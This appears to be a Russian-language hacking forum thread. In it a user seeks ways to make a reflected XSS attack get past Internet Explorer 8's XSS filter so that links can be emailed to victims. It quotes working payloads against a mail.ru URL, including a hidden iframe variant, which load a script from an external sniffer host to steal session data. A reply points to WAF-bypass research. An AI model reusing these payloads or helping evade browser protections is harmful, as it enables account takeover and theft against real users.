XSS не пробивает Internet Exporer 8 Столкнулся с проблемой, что пассивка XSS не пробивает Internet Exporer 8 PHP: http://11x11.mail.ru/?&url='"><script src=http://sniffer.ru/js.js></script> Блокируется выполнение сценариев кто как обходит защиту ИЕ 8 ? Запарился уже кодировать , все остальные браузеры пробивает, а на ИЕ 8 полный тормоз.
пассивку свою я выкладывать не стал, а взял наугад из темы пассивные ксс, дабы палева меньше было. так что это палевная пассивка, приведенная чисто для примера. доберман, я прекрасно знаю, что у меня на скрине, а скрин сделал чтоб было общее понятие как блокируется. кажется или я вопрос неправильно поставил или мне загодя неправильно отвечают. смотри, я пытаюсь кодировать фрейм с пассивкой, PHP: <iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="http://11x11.mail.ru/?&url='"><script src=http://sniffer.ru/js.js></script>"></iframe> закодировать его в яваскрипт, и дальше уже запускать в теле страницы скриптом <script src=закодированный.js></script> ан не пробивает, все равно распознается XSS совет про отключение фильтра ваще не к месту))), иначе при отправке жертве письма с ксс, мне надо отправлять следующий текст "если у вас ИЕ 7-8, то отключите, пожалуйста, фильтр безопасности перед тем как перейдете по следующей ссылке." ? мне надо было заскринить весь инструктаж по ксс, который выводится при клике мышкой? весь вопрос заключается в том, как в ИЕ 8 запустить пассивную ксс при включенном фильтре, как заставить ссылку обработаться в ИЕ 8, а не в том, что такое ксс и с чем его кушать. ps. за ссылку спасибо, пошел читать, может найду что нибудь полезное.
Обойти фильтр "при помощи js-обфускации" как советует товарищ dober.man не выйдет никоим образом. Ищите материал по обходу WAF (был то ли на конференции BlackHat, то ли в одном из отчётов об обходе WAF от Bitrix после проведения Chaos Constructions 2009). В нём было разобраны методы обхода mod_security, сухосин-патча и Анти-XSS фильтра в IE7. Ссылку дал бы, но не помню где Так что - ищите.
